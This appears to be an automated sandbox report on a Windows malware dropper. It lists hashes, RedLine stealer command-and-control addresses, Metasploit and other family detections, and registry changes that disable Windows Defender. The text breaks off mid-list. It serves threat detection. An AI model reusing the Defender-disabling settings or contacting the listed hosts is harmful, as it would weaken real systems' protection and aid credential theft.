Resubmissions
19-08-2021 18:59
210819-yrzbdtvqln 1018-08-2021 20:25
210818-4hztrzavcs 1018-08-2021 17:24
210818-9p8lqjhwv2 1017-08-2021 06:12
210817-kl4jvaaq7x 1016-08-2021 10:04
210816-nwc3tqkr3a 1016-08-2021 10:04
210816-5r5rafnh7e 1016-08-2021 10:04
210816-kdgh648t5e 1016-08-2021 09:37
210816-9esgfwsmfe 1016-08-2021 08:13
210816-26la9rblgn 1017-08-2021 08:51
210817-w2l5yq2wlnAnalysis
-
max time kernel
96s -
max time network
1312s -
platform
windows11_x64 -
resource
win11 -
submitted
17-08-2021 06:12
Static task
static1
Behavioral task
behavioral1
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win11
Behavioral task
behavioral3
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win10v20210408
General
-
Target
EB7233922891E1DAD0434FBD52623647.exe
-
Size
7.9MB
-
MD5
eb7233922891e1dad0434fbd52623647
-
SHA1
331126b108532ab9a1e932141bff55a38656bce9
-
SHA256
b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8
-
SHA512
597fbb0f397c45c8a2c5f63893c6d6bd4641e952510dfcac05dadb7afaaf4e005df1261649d4e79951979bad0be1fb09feebac7a6d23c31679590cbf40e1d4ac
Malware Config
Extracted
metasploit
windows/single_exec
Extracted
redline
ww
159.69.178.36:37556
Extracted
redline
4
213.166.68.170:16810
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral2/memory/4360-206-0x00000000015B0000-0x0000000001ED6000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3508 4788 rUNdlL32.eXe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3584 4788 rUNdlL32.eXe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4244 4788 rundll32.exe 23 -
Raccoon Stealer Payload 1 IoCs
resource yara_rule behavioral2/memory/5464-310-0x0000000004AC0000-0x0000000004B53000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 12 IoCs
resource yara_rule behavioral2/files/0x000300000002a37b-271.dat family_redline behavioral2/files/0x000300000002a3ae-286.dat family_redline behavioral2/files/0x000300000002a370-255.dat family_redline behavioral2/files/0x000300000002a370-306.dat family_redline behavioral2/memory/2812-358-0x0000019889EF0000-0x0000019889F09000-memory.dmp family_redline behavioral2/memory/5776-403-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/5312-453-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/1272-452-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/1204-447-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/1436-446-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/1204-515-0x0000000005570000-0x0000000005B88000-memory.dmp family_redline behavioral2/memory/5312-521-0x0000000005680000-0x0000000005C98000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 11 IoCs
description pid Process procid_target PID 3700 created 4584 3700 WerFault.exe 98 PID 5320 created 4360 5320 WerFault.exe 100 PID 468 created 1012 468 WerFault.exe 142 PID 1620 created 5464 1620 WerFault.exe 125 PID 4316 created 5548 4316 WerFault.exe 124 PID 5720 created 5524 5720 ufgaa.exe 126 PID 4152 created 5648 4152 WerFault.exe 144 PID 1192 created 5996 1192 WerFault.exe 169 PID 5256 created 5696 5256 WerFault.exe 121 PID 5652 created 2232 5652 WerFault.exe 165 PID 6364 created 5436 6364 WerFault.exe 133 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 1216 created 4136 1216 svchost.exe 188 PID 1216 created 4136 1216 svchost.exe 188 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
resource yara_rule behavioral2/memory/4360-206-0x00000000015B0000-0x0000000001ED6000-memory.dmp evasion behavioral2/files/0x000300000002a376-234.dat evasion behavioral2/files/0x000300000002a376-308.dat evasion behavioral2/files/0x000300000002a363-274.dat evasion behavioral2/files/0x000300000002a393-280.dat evasion behavioral2/files/0x000300000002a379-264.dat evasion -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/5548-331-0x0000000004A60000-0x0000000004AFD000-memory.dmp family_vidar -
Blocklisted process makes network request 1 IoCs
flow pid Process 164 1436 MsiExec.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 3692 KRSetp.exe 1540 Folder.exe 3472 Folder.exe 4360 Info.exe 5376 Installation.exe 4940 UN3EZFKchIMnv6Dr0leoPKhx.exe 3404 HzWqg9gjd5UML3kuFjfEhExk.exe 5276 Oryn26tHXTXfiJOgOUHgEWQC.exe 5368 hYoeE5hFqkEuvqhTjmw8MCmM.exe 5356 tc7tx2PYATrMO3q1RR7JDgxh.exe 5436 chqsf1lkE_zkaAtdaYT5l3cV.exe 5532 lu45MPPlSXDcE87FXpGzebNT.exe 5568 lFiB_5K9hnEQX8DzFjlPBY31.exe 5472 pTMuLJ8Llt3ZAyIu_jKMDOT6.exe 5548 gQfPleKPYUO3IgUyG6oZeDBE.exe 5560 gXEBS9ErjQRLqweha_8AC5QT.exe 5464 2o84zq2hVylVfyFnNpUXwFWj.exe 3384 qMn_tJPqi2r4PCGE4bJHiVBA.exe 5524 VXS2zUNs8c1vKDZu8VA8qxnQ.exe 5040 uGITRZ1Q5t0sp0tv9uZRib6I.exe 5300 W6aLoR23mFu4mCrl5FGlu3hP.exe 5316 WHT3zTM8vyl0pN8u26LRRztd.exe 5696 9HA8AUzkSkABD1aTFreqdLQL.exe 656 xupkdoyrIX37kZkiYbuCg7XQ.exe 2812 8fsyD3Gw2a2p5RQr7p20wmew.exe 5648 HmiIeGHuclxHvR2b2VWhEtfh.exe 548 4IiTX4vYv1b3qLdHmypJF56x.exe 1012 AlCWTV1YvTp6RqX1w0rqo08a.exe 1504 USk6VuEkJK4XsVXYU2D1C3Ec.exe 3024 customer3.exe 3080 md8_8eus.exe 3324 VUHljWwBSoWgPG29Im1iwYru.exe 4620 jooyu.exe 560 VUHljWwBSoWgPG29Im1iwYru.tmp 2232 UnL57BIFzdiV2uzSGYBM8OE1.exe 6076 _0_9LvHWXMJdm_i5kN35w66W.exe 1428 jfiag3g_gg.exe 5776 HzWqg9gjd5UML3kuFjfEhExk.exe 5996 USk6VuEkJK4XsVXYU2D1C3Ec.exe 1436 MsiExec.exe 1204 W6aLoR23mFu4mCrl5FGlu3hP.exe 5312 pTMuLJ8Llt3ZAyIu_jKMDOT6.exe 1272 xupkdoyrIX37kZkiYbuCg7XQ.exe 5332 11111.exe 4136 AdvancedRun.exe 1692 11111.exe 6084 4071221.exe 6088 11111.exe 4116 4411936.exe 2016 md9_1sjm.exe 4944 5642277.exe 1680 11111.exe 5720 ufgaa.exe 4132 11111.exe 4196 jfiag3g_gg.exe 5900 Setup.exe 4952 runvd.exe 6048 MediaBurner2.exe 680 askinstall53.exe 5936 Cleaner Installation.exe 2200 Versiumresearch.exe 1908 note8876.exe 3036 U0Y0YKNIlEqdzGuVOYcdoS5u.exe 5924 GameBox.exe -
resource yara_rule behavioral2/files/0x000300000002a3e5-323.dat vmprotect behavioral2/files/0x000300000002a3e5-322.dat vmprotect behavioral2/memory/3080-339-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion qMn_tJPqi2r4PCGE4bJHiVBA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion qMn_tJPqi2r4PCGE4bJHiVBA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4IiTX4vYv1b3qLdHmypJF56x.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4IiTX4vYv1b3qLdHmypJF56x.exe -
Loads dropped DLL 6 IoCs
pid Process 4584 rundll32.exe 2812 8fsyD3Gw2a2p5RQr7p20wmew.exe 560 VUHljWwBSoWgPG29Im1iwYru.tmp 560 VUHljWwBSoWgPG29Im1iwYru.tmp 5936 Cleaner Installation.exe 1280 MediaBurner2.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000300000002a37b-271.dat themida behavioral2/files/0x000300000002a3ae-286.dat themida -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features uGITRZ1Q5t0sp0tv9uZRib6I.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection uGITRZ1Q5t0sp0tv9uZRib6I.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" uGITRZ1Q5t0sp0tv9uZRib6I.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Documents\uGITRZ1Q5t0sp0tv9uZRib6I.exe = "0" uGITRZ1Q5t0sp0tv9uZRib6I.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" uGITRZ1Q5t0sp0tv9uZRib6I.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet uGITRZ1Q5t0sp0tv9uZRib6I.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" uGITRZ1Q5t0sp0tv9uZRib6I.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" uGITRZ1Q5t0sp0tv9uZRib6I.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths uGITRZ1Q5t0sp0tv9uZRib6I.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions uGITRZ1Q5t0sp0tv9uZRib6I.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA qMn_tJPqi2r4PCGE4bJHiVBA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4IiTX4vYv1b3qLdHmypJF56x.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 239 ipinfo.io 5 ipinfo.io 24 ip-api.com 62 ipinfo.io 137 ipinfo.io 200 ip-api.com 24 ipinfo.io 284 ipinfo.io 348 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 548 4IiTX4vYv1b3qLdHmypJF56x.exe 3384 qMn_tJPqi2r4PCGE4bJHiVBA.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 3404 set thread context of 5776 3404 HzWqg9gjd5UML3kuFjfEhExk.exe 167 PID 5368 set thread context of 1436 5368 hYoeE5hFqkEuvqhTjmw8MCmM.exe 318 PID 5300 set thread context of 1204 5300 PING.EXE 174 PID 5472 set thread context of 5312 5472 pTMuLJ8Llt3ZAyIu_jKMDOT6.exe 170 PID 656 set thread context of 1272 656 WerFault.exe 173 PID 5436 set thread context of 5720 5436 chqsf1lkE_zkaAtdaYT5l3cV.exe 300 PID 5040 set thread context of 6768 5040 uGITRZ1Q5t0sp0tv9uZRib6I.exe 539 -
Drops file in Program Files directory 15 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe lFiB_5K9hnEQX8DzFjlPBY31.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe lFiB_5K9hnEQX8DzFjlPBY31.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe Setup.exe File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe lFiB_5K9hnEQX8DzFjlPBY31.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe lFiB_5K9hnEQX8DzFjlPBY31.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini lFiB_5K9hnEQX8DzFjlPBY31.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe Setup.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 32 IoCs
pid pid_target Process procid_target 4512 4584 WerFault.exe 98 5340 4360 WerFault.exe 100 4584 1012 WerFault.exe 142 1440 5464 WerFault.exe 125 4716 5548 WerFault.exe 124 5568 5524 WerFault.exe 126 500 5996 WerFault.exe 169 5428 5648 WerFault.exe 144 1068 2232 WerFault.exe 165 656 5696 WerFault.exe 121 6488 5436 WerFault.exe 133 6408 4952 WerFault.exe 210 6164 7096 WerFault.exe 240 7036 680 WerFault.exe 208 5008 6084 WerFault.exe 187 6552 5412 WerFault.exe 229 2068 6716 WerFault.exe 232 1900 6708 WerFault.exe 321 5380 5492 WerFault.exe 322 5564 240 WerFault.exe 333 6924 7000 WerFault.exe 317 3500 7280 WerFault.exe 385 5800 1888 WerFault.exe 369 7488 7288 WerFault.exe 384 3820 6948 WerFault.exe 371 6696 3804 WerFault.exe 366 7724 7324 WerFault.exe 373 7652 1548 WerFault.exe 410 6484 5440 WerFault.exe 359 5572 6564 WerFault.exe 442 6016 7256 WerFault.exe 387 440 6940 WerFault.exe 414 -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MsiExec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier MsiExec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision MsiExec.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 MsiExec.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 MsiExec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MsiExec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier MsiExec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7020 schtasks.exe 6776 schtasks.exe 2204 schtasks.exe 5352 schtasks.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 7612 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 23 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS MsiExec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU MsiExec.exe -
Kills process with taskkill 2 IoCs
pid Process 5948 taskkill.exe 3340 taskkill.exe -
Modifies data under HKEY_USERS 40 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created 